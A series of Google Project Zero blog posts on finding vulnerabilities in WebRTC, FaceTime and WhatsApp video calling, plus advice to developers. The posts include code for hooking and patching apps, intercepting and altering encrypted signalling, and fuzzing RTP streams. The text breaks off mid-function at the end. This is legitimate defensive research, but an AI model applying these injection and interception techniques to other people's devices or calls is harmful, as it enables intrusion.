Google Project Zero

News and updates from the Project Zero team at Google

Adventures in Video Conferencing Part 5: Where Do We Go from Here?

Thu, 12/13/2018 - 13:55
Posted by Natalie Silvanovich, Project Zero
Overall, our video conferencing research found a total of 11 bugs in WebRTC, FaceTime and WhatsApp. The majority of these were found through less than 15 minutes of mutation fuzzing RTP. We were surprised to find remote bugs so easily in code that is so widely distributed. There are several properties of video conferencing that likely led to the frequency and shallowness of these issues.

WebRTC Bug Reporting

When we started looking at WebRTC, we were surprised to discover that their website did not describe how to report vulnerabilities to the project. They had an open bug tracker, but no specific guidance on how to flag or report vulnerabilities. They also provided no security guidance for integrators, and there was no clear way for integrators to determine when they needed to update their source for security fixes. Many integrators seem to have branched WebRTC without considering how they would apply security updates. The combination of these factors makes it more likely that vulnerabilities did not get reported, vulnerabilities or fixes got ‘lost’ in the tracker, fixes regressed, or fixes did not get applied to implementations that use the source in part.
We worked with the WebRTC team to add this guidance to the site, and to clarify their vulnerability reporting process. Despite these changes, several large software vendors reached out to our team with questions about how to fix the vulnerabilities we reported. This shows there is still a lack of clarity on how to fix vulnerabilities in WebRTC.

Video Conferencing Test Tools

We also discovered that most video conferencing solutions lack adequate test tools. In most implementations, there is no way to collect data that allows problems with an RTP stream to be diagnosed. The vendors we asked did not have such a tool, even internally. WebRTC had a mostly complete tool that allows streams to be recorded in the browser and replayed, but it did not work with streams that used non-default settings. This tool has now been updated to collect enough data to be able to replay any stream. The lack of tooling available to test RTP implementations likely contributed to the ease of finding vulnerabilities, and certainly made reproducing and reporting vulnerabilities more difficult.

Video Conferencing Standards

The standards that comprise video conferencing, such as RTP, RTCP and FEC, introduce a lot of complexity in achieving their goal of enabling reliable audio and video streams across any type of connection. While the majority of this complexity provides value to the end user, it also means that video conferencing is inherently difficult to implement securely.

The Scope of Video Conferencing

WebRTC has billions of users. While it was originally created for use in the Chrome browser, it is now integrated by at least two Android applications that eclipse Chrome in terms of users: Facebook and WhatsApp (which only uses part of WebRTC). It is also used by Firefox and Safari. It is likely that most mobile devices run multiple copies of the WebRTC library. The ubiquity of WebRTC coupled with the lack of a clear patch strategy makes it an especially concerning target for attackers.

Recommendations for Developers

This section contains recommendations for developers who are implementing video conferencing, based on our observations from this research.
First, it is a good idea to use an existing solution for video conferencing (either WebRTC or PJSIP) as opposed to implementing a new one. Video conferencing is very complex, and every implementation we looked at had vulnerabilities, so it is unlikely a new implementation would avoid these problems. Existing solutions have undergone at least some security testing and would likely have fewer problems.
It is also advisable to avoid branching existing video conferencing code. We have received questions from vendors who have branched WebRTC, and it is clear that this makes patching vulnerabilities more difficult. While branching can solve problems in the short term, integrators often regret it in the long term.
It is important to have a patch strategy when implementing video conferencing, as there will inevitably be vulnerabilities found in any implementation that is used. Developers should understand how security patches are distributed for any third-party library they integrate, and have a plan for applying them as soon as they are available.
It is also important to have adequate test tools for a video conferencing application, even if a third-party implementation is used. It is a good idea to have a way to reproduce a call from end to end. This is useful in diagnosing crashes, which could have a security impact, as well as functional problems.
Several mobile applications we looked at had unnecessary attack surface. Specifically, codecs and other features of the video conferencing implementation were enabled and accessible via RTP even though no legitimate call would ever use them. WebRTC and PJSIP support disabling specific features such as codecs and FEC. It is a good idea to disable the features that are not being used.
Finally, video conferencing vulnerabilities can generally be split into those that require the target to answer the incoming call, and those that do not. Vulnerabilities that do not require the call to be answered are more dangerous. We observed that some video conferencing applications perform much more parsing of untrusted data before a call is answered than others. We recommend that developers put as much functionality after the call is answered as possible.

Tools
In order to open up the most popular video conferencing implementations to more security research, we are releasing the tools we developed to do this research. Street Party is a suite of tools that allows the RTP streams of video conferencing implementations to be viewed and modified. It includes:
  • WebRTC: instructions for recording and replaying RTP packets using WebRTC’s existing tools
  • FaceTime: hooks for recording and replaying FaceTime calls
  • WhatsApp: hooks for recording and replaying WhatsApp calls on Android

We hope these tools encourage even more investigation into the security properties of video conferencing. Contributions are welcome.

Conclusion
We reviewed WebRTC, FaceTime and WhatsApp and found 11 serious vulnerabilities in their video conferencing implementations. Accessing and altering their encrypted content streams required substantial tooling. We are releasing this tooling to enable additional security research on these targets. There are many properties of video conferencing that make it susceptible to vulnerabilities. Adequate testing, conservative design and frequent patching can reduce the security risk of video conferencing implementations.
Categories: Security

Adventures in Video Conferencing Part 4: What Didn't Work Out with WhatsApp

Wed, 12/12/2018 - 13:54
Posted by Natalie Silvanovich, Project Zero
Not every attempt to find bugs is successful. When looking at WhatsApp, we spent a lot of time reviewing call signalling hoping to find a remote, interaction-less vulnerability. No such bugs were found. We are sharing our work with the hopes of saving other researchers the time it took to go down this very long road. Or maybe it will give others ideas for vulnerabilities we didn’t find.
As discussed in Part 1, signalling is the process through which video conferencing peers initiate a call. Usually, at least part of signalling occurs before the receiving peer answers the call. This means that if there is a vulnerability in the code that processes incoming signals before the call is answered, it does not require any user interaction.
WhatsApp implements signalling using a series of WhatsApp messages. Opening libwhatsapp.so in IDA, there are several native calls that handle incoming signalling messages.
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAck
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallRekeyRequest
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallFlowControl
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferReceipt
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallAcceptReceipt
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferPreAccept
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChangedAck
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferReject
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallTerminate
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallTransport
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayLatency
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallRelayElection
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallInterrupted
Java_com_whatsapp_voipcalling_Voip_nativeHandleCallMuted
Java_com_whatsapp_voipcalling_Voip_nativeHandleWebClientMessage
Using apktool to extract the WhatsApp APK, it appears these natives are called from a loop in the com.whatsapp.voipcalling.Voip class. Looking at the smali, it looks like signalling messages are sent as WhatsApp messages via the WhatsApp server, and this loop handles the incoming messages.
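A quick way to enumerate these handlers is to search the decoded smali for native method declarations. The sketch below assumes the APK has already been decoded with apktool (the output directory name is illustrative):

# Sketch: list the native signalling handlers in the apktool output.
# Assumes `apktool d whatsapp.apk -o whatsapp_out` was run first; the
# directory name is an assumption.
import os
import re

SMALI_ROOT = "whatsapp_out"
NATIVE_RE = re.compile(r"^\.method.*\bnative\b\s+(nativeHandle\w+)\(", re.M)

for dirpath, _, filenames in os.walk(SMALI_ROOT):
    for filename in filenames:
        if filename.endswith(".smali"):
            with open(os.path.join(dirpath, filename)) as f:
                for name in NATIVE_RE.findall(f.read()):
                    print(filename, name)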
Immediately, I noticed that there was a peer-to-peer encrypted portion of the message (the rest of the message is only encrypted peer-to-server). I thought this had the highest potential of reaching bugs, as the server would not be able to sanitize the data. In order to be able to read and alter encrypted packets, I set up a remote server with a python script that opens a socket. Whenever this socket receives data, the data is displayed on the screen, and I have the option of either sending the unaltered packet or altering the packet before it is sent. I then looked for the point in the WhatsApp smali where messages are peer-to-peer encrypted.
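The server script itself was not published with this post, but a minimal sketch of the idea looks like the following; the port number and the one-packet-per-recv framing are assumptions:

# Sketch of the interception server: display each packet received from the
# instrumented APK and let the operator send it back unaltered or
# substitute different bytes.
import socket

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("0.0.0.0", 9999))
server.listen(1)
conn, addr = server.accept()
print("connection from", addr)

while True:
    data = conn.recv(4096)
    if not data:
        break
    print("packet:", data.hex())
    altered = input("hex to send instead (blank = unaltered): ").strip()
    conn.sendall(bytes.fromhex(altered) if altered else data)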
Since WhatsApp uses libsignal for peer-to-peer encryption, I was able to find where messages are encrypted by matching log entries. I then added smali code that sends a packet with the bytes of the message to the server I set up, and then replaces it with the bytes the server returns (changing the size of the byte array if necessary). This allowed me to view and alter the peer-to-peer encrypted message. Making a call using this modified APK, I discovered that the peer-to-peer message was always exactly 24 bytes long, and appeared to be random. I suspected that this was the encryption key used by the call, and confirmed this by looking at the smali.
A single encryption key doesn’t have a lot of potential for malformed data to lead to bugs (I tried lengthening and shortening it to be safe, but got nothing but unexploitable null pointer issues), so I moved on to looking at the peer-to-server encrypted messages. Looking at the Voip loop in smali, it looked like the general flow is that the device receives an incoming message, it is deserialized and if it is of the right type, it is forwarded to the messaging loop. Then certain properties are read from the message, and it is forwarded to a processing function based on its type. Then the processing function reads even more properties, and calls one of the above native methods with the properties as its parameters. Most of these functions have more than 20 parameters.
Many of these functions perform logging when they are called, so by making a test call, I could figure out which functions get called before a call is picked up. It turns out that during a normal incoming call, the device only receives an offer and calls Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer, and then spawns the incoming call screen in WhatsApp. All the other signal types are not used until the call is picked up.
An immediate question I had was whether other signal types are processed if they are received before a call is picked up. Just because the initiating device never sends these signal types before the call is picked up doesn’t mean the receiving device wouldn’t process them if it received them.
Looking through the APK smali, I found the class com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback, which has several methods like sendOffer and sendAccept that appeared to send the messages processed by these native calls. I changed sendOffer to call other send methods, like sendAccept, instead of its normal messaging functionality. Trying this, I discovered that the Voip loop will process any signal type regardless of whether the call has been answered. The native methods will then parse the parameters, process them and put the results in a buffer, and then call a single method to process the buffer. It is only at that point that processing will stop if the message is of the wrong type.

I then reviewed all of the above methods in IDA. The code was very conservatively written, and most needed checks were performed. However, there were a few areas that potentially had bugs that I wanted to investigate more. I decided that changing the parameters to calls in com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback was too slow to test the number of cases I wanted to test, and went looking for another way to alter the messages.
Ideally, I wanted a way to pass peer-to-server encrypted messages to my server before they were sent, so I could view and alter them. I went through the WhatsApp APK smali looking for a point after serialization but before encryption where I could add my smali function that sends and alters the packets. This was fairly difficult and time consuming, and I eventually put my smali in every method that wrote to a non-file ByteArrayOutputStream in the com.whatsapp.protocol and com.whatsapp.messaging packages (about 10 total) and looked for where it got called. I figured out where it got called, and fixed the class so that anywhere a byte array was written out from a stream, it got sent to my server, and removed the other calls. (If you’re following along at home, the smali file I changed included the string “Double byte dictionary token out of range”, and the two methods I changed contained calls to toByteArray, and ended with invoking a protocol interface.) Looking at what got sent to my server, it seemed like a reasonably comprehensive collection of WhatsApp messages, and the signalling messages contained what I thought they would.
WhatsApp messages are in a compressed XMPP format. A lot of parsers have been written for reverse engineering this protocol, but I found the whatsapp-reveng parser worked the best. I did have to replace the tokens in whatsapp_defines.py with a list extracted from the APK for it to work correctly though. This made it easier to figure out what was in each packet sent to the server.
Playing with this a bit, I discovered that there are three types of checks in WhatsApp signalling messages. First, the server validates and modifies incoming signalling messages. Secondly, the messages are deserialized, and this can cause errors if the format is incorrect, and generally limits the contents of the Java message object that is passed on. Finally, the native methods perform checks on their parameters.
These additional checks prevented several of the areas I thought were problems from actually being problems. For example, there is a function called by Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer that takes in an array of byte arrays, an array of integers and an array of booleans. It uses these values to construct candidates for the call. It checks that the array of byte arrays and the array of integers are of the same length before it loops through them, using values from each, but it does not perform the same check on the boolean array. I thought that this could go out of bounds, but it turns out that the integer and booleans are serialized as a vector of <int,bool> pairs, and the arrays are then copied from the vector, so it is not actually possible to send arrays with different lengths.
One area of the signalling messages that looked especially concerning was the voip_options field of the message. This field is never sent from the sending device, but is added to the message by the server before it is forwarded to the receiving device. It is a buffer in JSON format that is processed by the receiving device and contains dozens of configuration parameters.
{"aec":{"offset":"0","mode":"2","echo_detector_mode":"4","echo_detector_impl":"2","ec_threshold":"50","ec_off_threshold":"40","disable_agc":"1","algorithm":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"aecm_adapt_step_size":"2"},"agc":{"mode":"0","limiterenable":"1","compressiongain":"9","targetlevel":"1"},"bwe":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"encode":{"complexity":"5","cbr":"0"},"init_bwe":{"use_local_probing_rx_bitrate":"1","test_flags":"982188032","max_tx_rott_based_bitrate":"128000","max_bytes":"8000","max_bitrate":"350000"},"ns":{"mode":"1"},"options":{"connecting_tone_desc": "test","video_codec_priority":"2","transport_stats_p2p_threshold":"0.5","spam_call_threshold_seconds":"55","mtu_size":"1200","media_pipeline_setup_wait_threshold_in_msec":"1500","low_battery_notify_threshold":"5","ip_config":"1","enc_fps_over_capture_fps_threshold":"1","enable_ssrc_demux":"1","enable_preaccept_received_update":"1","enable_periodical_aud_rr_processing":"1","enable_new_transport_stats":"1","enable_group_call":"1","enable_camera_abtest_texture_preview":"1","enable_audio_video_switch":"1","caller_end_call_threshold":"1500","call_start_delay":"1200","audio_encode_offload":"1","android_call_connected_toast":"1"}Sample voip_options (truncated)
If a peer could send a voip_options parameter to another peer, it would open up a lot of attack surface, including a JSON parser and the processing of these parameters. Since this parameter almost always appears in an offer, I tried modifying an offer to contain one, but the offer was rejected by the WhatsApp server with error 403. Looking at the binary, there were three other signal types in the incoming call flow that could accept a voip_options parameter. Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept and Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged messages were accepted by the server if a voip_options parameter was included, but it was stripped before the message was sent to the peer. However, if a voip_options parameter was attached to a Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo message, it would be forwarded to the peer device. I confirmed this by sending malformed JSON and looking at the log of the receiving device for an error.
The voip_options parameter is processed by WhatsApp in three stages. First, the JSON is parsed into a tree. Then the tree is transformed to a map, so JSON object properties can be looked up efficiently even though there are dozens of them. Finally, WhatsApp goes through the map, looking for specific parameters and processes them, usually copying them to an area in memory where they will set a value relevant to the call being made.
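WhatsApp's map structure is custom, but the general tree-to-map transformation is easy to illustrate. The sketch below is illustrative only, not WhatsApp's implementation: it flattens nested JSON into a single dictionary keyed by dotted paths, so parameter lookups don't have to walk the tree.

# Illustration of the tree-to-map idea (not WhatsApp's code): flatten the
# parsed JSON into one dictionary so parameters can be looked up by path.
import json

def flatten(node, prefix="", out=None):
    if out is None:
        out = {}
    if isinstance(node, dict):
        for key, value in node.items():
            flatten(value, prefix + key + ".", out)
    else:
        out[prefix[:-1]] = node
    return out

tree = json.loads('{"aec": {"mode": "2"}, "options": {"mtu_size": "1200"}}')
params = flatten(tree)
print(params["options.mtu_size"])  # prints: 1200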
Starting off with the JSON parser, it was clearly the PJSIP JSON parser. I compiled the code and fuzzed it, and only found one minor out-of-bounds read issue.
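The fuzzing loop was conceptually simple; a sketch, assuming a standalone harness binary (here called json_harness, a hypothetical name) that reads a voip_options buffer on stdin:

# Sketch of a mutation fuzzer driving a standalone parser build. On POSIX,
# a negative return code means the process was killed by a signal, i.e. a
# probable crash.
import random
import subprocess

SEED = b'{"aec":{"mode":"2"},"options":{"mtu_size":"1200"}}'

for iteration in range(100000):
    data = bytearray(SEED)
    for _ in range(random.randint(1, 8)):
        data[random.randrange(len(data))] = random.randrange(256)
    result = subprocess.run(["./json_harness"], input=bytes(data),
                            capture_output=True)
    if result.returncode < 0:
        print("crash, signal", -result.returncode, bytes(data))
        break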
I then looked at the conversion of the JSON tree output from the parser into the map. The map is a very efficient structure. It is a hash map that uses FarmHash as its hashing algorithm, and it is designed so that the entire map is stored in a single slab of memory, even if the JSON objects are deeply nested. I looked at many open source projects that contained similar structures, but could not find one that looked similar. I looked through the creation of this structure in great detail, looking especially for type confusion bugs as well as errors when the memory slab is expanded, but did not find any issues.
I also looked at the functions that go through the map and handle specific parameters. These functions are extremely long, and I suspect they are generated using a code generation tool such as bison. They mostly copy parameters into static areas of memory, at which point they become difficult to trace. I did not find any bugs in this area either. Other than going through parameter names and looking for values that seemed likely to cause problems, I did not do any analysis of how the values fetched from the JSON are actually used. One parameter that seemed especially promising was an A/B test parameter called setup_video_stream_before_accept. I hoped that setting this would allow the device to accept RTP before the call is answered, which would make RTP bugs interaction-less, but I was unable to get this to work.
In the process of looking at this code, it became difficult to verify its functionality without the ability to debug it. Since WhatsApp ships an x86 library for Android, I wondered if it would be possible to run the JSON parser on Linux.
Tavis Ormandy created a tool that can load the libwhatsapp.so library on Linux and run native functions, so long as they do not have a dependency on the JVM. It works by patching the .dynamic ELF section to remove unnecessary dependencies, replacing DT_NEEDED tags with DT_DEBUG tags. We also needed to remove constructors and destructors by changing the DT_FINI_ARRAYSZ and DT_INIT_ARRAYSZ values to zero. With these changes in place, we could load the library using dlopen() and use dlsym() and dlclose() as normal.
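Roughly, that patching can be sketched in a few lines; this assumes a 64-bit little-endian libwhatsapp.so and uses pyelftools to locate the .dynamic section (the original tool may be implemented quite differently):

# Sketch of the .dynamic patch: turn DT_NEEDED entries into DT_DEBUG and
# zero the init/fini array sizes. Elf64_Dyn entries are 16 bytes: a signed
# 8-byte tag followed by an 8-byte value.
import struct
from elftools.elf.elffile import ELFFile

DT_NEEDED, DT_DEBUG = 1, 21
DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ = 27, 28

with open("libwhatsapp.so", "r+b") as f:
    dynamic = ELFFile(f).get_section_by_name(".dynamic")
    offset, size = dynamic["sh_offset"], dynamic["sh_size"]
    for entry in range(offset, offset + size, 16):
        f.seek(entry)
        tag, value = struct.unpack("<qQ", f.read(16))
        if tag == DT_NEEDED:
            f.seek(entry)
            f.write(struct.pack("<qQ", DT_DEBUG, value))
        elif tag in (DT_INIT_ARRAYSZ, DT_FINI_ARRAYSZ):
            f.seek(entry)
            f.write(struct.pack("<qQ", tag, 0))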
Using this tool, I was able to look at the JSON parsing in more detail. I also set up distributed fuzzing of the JSON binary. Unfortunately, it did not uncover any bugs either.
Overall, WhatsApp signalling seemed like a promising attack surface, but we did not find any vulnerabilities in it. There were two areas where we were able to extend the attack surface beyond what is used in the basic call flow. First, it was possible to send signalling messages that should only be sent after a call is answered before the call is answered, and they were processed by the receiving device. Second, it was possible for a peer to send voip_options JSON to another device. WhatsApp could reduce the attack surface of signalling by removing these capabilities.
I made these suggestions to WhatsApp, and they responded that they were already aware of the first issue as well as variants of the second issue. They said they were in the process of limiting what signalling messages can be processed by the device before a call is answered. They had already fixed other issues where a peer can send voip_options JSON to another peer, and fixed the method I reported as well. They said they are also considering adding cryptographic signing to the voip_options parameter so a device can verify it came from the server to further avoid issues like this. We appreciate their quick resolution of the voip_options issue and strong interest in implementing defense-in-depth measures.
In Part 5, we will discuss the conclusions of our research and make recommendations for better securing video conferencing.
Categories: Security

Adventures in Video Conferencing Part 3: The Even Wilder World of WhatsApp

Tue, 12/11/2018 - 12:42
Posted by Natalie Silvanovich, Project Zero
WhatsApp is another application that supports video conferencing without using WebRTC as its core implementation. Instead, it uses PJSIP, which contains some WebRTC code but also a substantial amount of other code, and predates the WebRTC project. I fuzzed this implementation to see if it had similar results to WebRTC and FaceTime.

Fuzzing Set-up

PJSIP is open source, so it was easy to identify the PJSIP code in the Android WhatsApp binary (libwhatsapp.so). Since PJSIP uses the open source library libsrtp, I started off by opening the binary in IDA and searching for the string srtp_protect, the name of the function libsrtp uses for encryption. This led to a log entry emitted by a function that looked like srtp_protect. There was only one function in the binary that called this function, and it called memcpy soon before the call. Some log entries before the call contained the file name srtp_transport.c, which exists in the PJSIP repository. The log entries in the WhatsApp binary say that the function being called is transport_send_rtp2; the PJSIP source only has a function called transport_send_rtp, but it looks similar to the function calling srtp_protect in WhatsApp, in that it has the same number of calls before and after the memcpy. Assuming that the code in WhatsApp is some variation of that code, the memcpy copies the entire unencrypted packet right before it is encrypted.
Hooking this memcpy seemed like a possible way to fuzz WhatsApp video calling. I started off by hooking memcpy for the entire app using a tool called Frida. This tool can easily hook native functions in Android applications, and I was able to see calls to memcpy from WhatsApp within minutes. Unfortunately though, video conferencing is very performance sensitive, and a delay sending video packets actually influences the contents of the next packet, so hooking every memcpy call didn’t seem practical. Instead, I decided to change the single memcpy to point to a function I wrote.
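For reference, the initial whole-app experiment only takes a few lines of Frida; the process name and the USB transport below are assumptions about the test setup:

# Sketch of the quick Frida test: log the length of every memcpy call in
# the WhatsApp process. Too slow for live calls, but useful for confirming
# that hooking works at all.
import frida

JS = """
Interceptor.attach(Module.getExportByName(null, 'memcpy'), {
    onEnter(args) {
        send('memcpy len=' + args[2].toInt32());
    }
});
"""

session = frida.get_usb_device().attach("WhatsApp")
script = session.create_script(JS)
script.on("message", lambda message, data: print(message))
script.load()
input("hooked, press enter to detach\n")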
I started off by writing a function in assembly that loaded a library from the filesystem using dlopen, retrieved a symbol by calling dlsym and then called into the library. Frida was very useful in debugging this, as it could hook calls to dlopen and dlsym to make sure they were being called correctly. I overwrote a function in the WhatsApp GIF transcoder with this function, as it is only used in sending text messages, which I didn’t plan to do with this altered version. I then set the memcpy call to point to this function instead of memcpy, using this online ARM branch finder.
sub_2F8CC
    MOV             X21, X30
    MOV             X22, X0
    MOV             X23, X1
    MOV             X20, X2
    MOV             X1, #1
    ADRP            X0, #aDataDataCom_wh@PAGE ; "/data/data/com.whatsapp/libn.so"
    ADD             X0, X0, #aDataDataCom_wh@PAGEOFF ; "/data/data/com.whatsapp/libn.so"
    BL              .dlopen
    ADRP            X1, #aApthread@PAGE ; "apthread"
    ADD             X1, X1, #aApthread@PAGEOFF ; "apthread"
    BL              .dlsym
    MOV             X8, X0
    MOV             X0, X22
    MOV             X1, X23
    MOV             X2, X20
    NOP
    BLR             X8
    MOV             X30, X21
    RET

The library loading function
I then wrote a library for Android which had the same parameters as memcpy, but fuzzed and copied the buffer instead of just copying it, and put it on the filesystem where it would be loaded by dlopen. I then tried making a WhatsApp call with this setup. The video call looked like it was being fuzzed and crashed in roughly fifteen minutes.

Replay Set-up
To replay the packets I added logging to the library, so that each buffer that was altered would also be saved to a file. Then I created a second library that copied the logged packets into the buffer being copied instead of altering it. This required modifying the WhatsApp binary slightly, because the logged packet will usually not be the same size as the packet currently being sent. I changed the length of the hooked memcpy to be passed by reference instead of by value, and then had the library change the length to the length of the logged packet. This changed the value of the length so that it would be correct for the call to srtp_protect. Luckily, the buffer that the packet is copied into is a fixed length, so there is no concern that a valid packet will overflow the buffer length. This is a common design pattern in RTP processing that improves performance by reducing length checks. It was also helpful in modifying FaceTime to replay packets of varying length, as described in the previous post.
This initial replay setup did not work, and looking at the logged packets, it turned out that WhatsApp uses four streams with different SSRCs for video conferencing (possibly one for video, one for audio, one for synchronization and one for good luck). The streams each had only one payload type, and they were all different, so it was fairly easy to map each SSRC to its stream. So I modified the replay library to determine the current SSRC for each stream based on the payload types of incoming packets, and then to replace the SSRC of the replayed packets with the correct one based on their payload type. This reliably replayed a WhatsApp call. I was then able to fuzz and reproduce crashes on WhatsApp.

Results

Using this setup, I reported one heap corruption issue in WhatsApp, CVE-2018-6344. This issue has since been fixed. After it was resolved, fuzzing did not yield any additional crashes with security impact, and we moved on to other methodologies. Part 4 will describe our other (unsuccessful) attempts to find vulnerabilities in WhatsApp.
Categories: Security

Adventures in Video Conferencing Part 2: Fun with FaceTime

Wed, 12/05/2018 - 13:43
Posted by Natalie Silvanovich, Project Zero
FaceTime is Apple’s video conferencing application for iOS and Mac. It is closed source, and does not appear to use any third-party libraries for its core functionality. I wondered whether fuzzing the contents of FaceTime’s audio and video streams would lead to similar results as WebRTC.

Fuzzing Set-up
Philipp Hancke performed an excellent analysis of FaceTime’s architecture in 2015. It is similar to WebRTC, in that it exchanges signalling information in SDP format and then uses RTP for audio and video streams. Looking at the FaceTime implementation on a Mac, it seemed the bulk of FaceTime's calling functionality is in a daemon called avconferenced. Opening the binary that supports its functionality, AVConference, in IDA, I found that it contains a function called SRTPEncryptData. This function calls CCCryptorUpdate, which appeared to encrypt RTP packets below the header.
To do a quick test of whether fuzzing was likely to be effective, I hooked this function and altered the underlying encrypted data. Normally, this can be done by setting the DYLD_INSERT_LIBRARIES environment variable, but since avconferenced is a daemon that restarts automatically when it dies, there wasn’t an easy way to set an environment variable. I eventually used insert_dylib to alter the AVConference binary to load a library on startup, and restarted the process. The loaded library used DYLD_INTERPOSE to replace CCCryptorUpdate with a version that fuzzed every input buffer (using fuzzer q from Part 1) before it was processed. This implementation had a lot of problems: it fuzzed both encryption and decryption, it affected every call to CCCryptorUpdate from avconferenced, not just the ones involved in SRTP, and there was no way to reproduce a crash. But using the modified FaceTime to call an iPhone led to video output that looked corrupted, and the phone crashed in a few minutes. This confirmed that this function was indeed where FaceTime calls are encrypted, and that fuzzing was likely to find bugs.
I made a few changes to the function that hooked CCCryptorUpdate to attempt to solve these problems. I limited fuzzing the input buffer to the two threads that write audio and video output to RTP, which also solved the problem of decrypted packets being fuzzed, as these threads only ever encrypt. I then added functionality that wrote the encrypted, fuzzed contents of each packet to a series of log files, so that test cases could be replayed. This required altering the sandbox of avconferenced so that it could write files to the log location, and adding spinlocks to the hook, as calling CCCryptorUpdate is thread safe, but logging packets isn’t.

Call Replay
I then wrote a second library that hooks CCCryptorUpdate and replays packets logged by the first library by copying the logged packets in sequence into the packet buffers passed into the function. Unfortunately, this required a small modification to the AVConference binary, as the SRTPEncryptData function does not respect the length returned by CCCryptorUpdate; instead, it assumes that the length of the encrypted data is the same as the length as the plaintext data, which is reasonable when CCCryptorUpdate isn’t being hooked. Since SRTPEncryptData always uses a large fixed-size buffer for encryption, and encryption is in-place, I changed the function to retrieve the length of the encrypted buffer from the very end of the buffer, which was set in the hooked CCCryptorUpdate call. This memory is unlikely to be used for other purposes due to the typical shorter length of RTP packets. Unfortunately though, even though the same encrypted data was being replayed to the target, it wasn’t being processed correctly by the receiving device.
To understand why requires an explanation of how RTP works. An RTP packet has the following format.

It contains several fields that impact how its payload is interpreted. The SSRC is a random identifier that identifies a stream. For example, in FaceTime the audio and video streams have different SSRCs. SSRCs can also help differentiate between streams in a situation where a user could potentially have an unlimited number of streams, for example, multiple participants in a video call. RTP packets also have a payload type (PT in the diagram) which is used to differentiate different types of data in the payload. The payload type for a certain data type is consistent across calls. In FaceTime, the video stream has a single payload type for video data, but the audio stream has two payload types, likely one for audio data and the other for synchronization. The marker (M in the diagram) field of RTP is also used by FaceTime to represent when a packet is fragmented, and needs to be reassembled.
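The fixed header layout is standard (RFC 3550), so these fields are easy to pull out of a logged packet. A minimal parser, useful when classifying logged packets by stream:

# Parse the 12-byte fixed RTP header: version/padding/extension/CSRC count,
# marker + payload type, sequence number, timestamp and SSRC.
import struct

def parse_rtp_header(packet):
    first, mpt, seq, timestamp, ssrc = struct.unpack_from("!BBHII", packet)
    return {
        "version": first >> 6,
        "has_extension": bool(first & 0x10),
        "csrc_count": first & 0x0F,
        "marker": bool(mpt & 0x80),
        "payload_type": mpt & 0x7F,
        "sequence": seq,
        "timestamp": timestamp,
        "ssrc": ssrc,
    }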
From this it is clear that simply copying logged data into the current encrypted packet won’t function correctly, because the data needs to have the correct SSRC, payload type and marker, or it won’t be interpreted correctly. This wasn’t necessary in WebRTC, because I had enough control over WebRTC that I could create a connection with a single SSRC and payload type for fuzzing purposes. But there is no way to do this in FaceTime, even muting a video call leads to silent audio packets being sent as opposed to the audio stream shutting down. So these values needed to be manually corrected.
An RTP feature called extensions made correcting these fields difficult. An extension is an optional header that can be added to an RTP packet. Extensions are not supposed to depend on the RTP payload to be interpreted, and extensions are often used to transmit network or display features. Some examples of supported extensions include the orientation extension, which tells the endpoint the orientation of the receiving device and the mute extension, which tells the endpoint whether the receiving device is muted.
Extensions mean that even if it is possible to determine the payload type, marker and SSRC of data, this is not sufficient to replay the exact packet that was sent. Moreover, FaceTime creates extensions after the packet is encrypted, so it is not possible to create the complete RTP packet by hooking CCCryptorUpdate, because extensions could be added later.
At this point, it seemed necessary to hook sendmsg as well as CCCryptorUpdate. This would allow the outgoing RTP header to be modified once it is complete. There were a few challenges in doing this. To start, audio and video packets are sent by different threads in FaceTime, and can be reordered between the time they are encrypted and the time they are sent by sendmsg. So I couldn’t assume that if sendmsg received an RTP packet, it was necessarily the last one that was encrypted. There was also the problem that SSRCs are dynamic, so replaying an RTP packet with the same SSRC it was recorded with won’t work; it needs to have the new SSRC for the audio or video stream.
Note that in macOS Mojave, FaceTime can call sendmsg via either the AVConference binary or the IDSFoundation binary, depending on the network configuration. So to capture and replay unencrypted RTP traffic on newer systems, it is necessary to hook CCCryptorUpdate in AVConference and sendmsg in IDSFoundation (AVConference calls into IDSFoundation when it calls sendmsg). Otherwise, the process is the same as on older systems.
I ended up implementing a solution that recorded each packet's unencrypted payload together with its RTP header, using a snippet of the encrypted payload to pair each header with the correct unencrypted payload. Then, to replay packets, the packets encrypted in CCCryptorUpdate were replaced with the logged packets, and once the encrypted payload came through to sendmsg, the header was replaced with the logged one for that payload. Fortunately, the two streams with unique SSRCs used by FaceTime do not share any payload types, so it was possible to determine the new SSRC for each stream by waiting for an incoming packet with the correct payload type. Then in each subsequent packet, the SSRC was replaced with the correct one.
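A sketch of that pairing logic; the snippet length and the hook entry points are assumptions (the real hooks live in the injected library):

# Sketch of pairing RTP headers with logged plaintext payloads, keyed by a
# short snippet of ciphertext. SNIPPET_LEN and the callbacks are
# illustrative, not the published tool.
SNIPPET_LEN = 8

payload_by_snippet = {}

def log_pair(header, payload):
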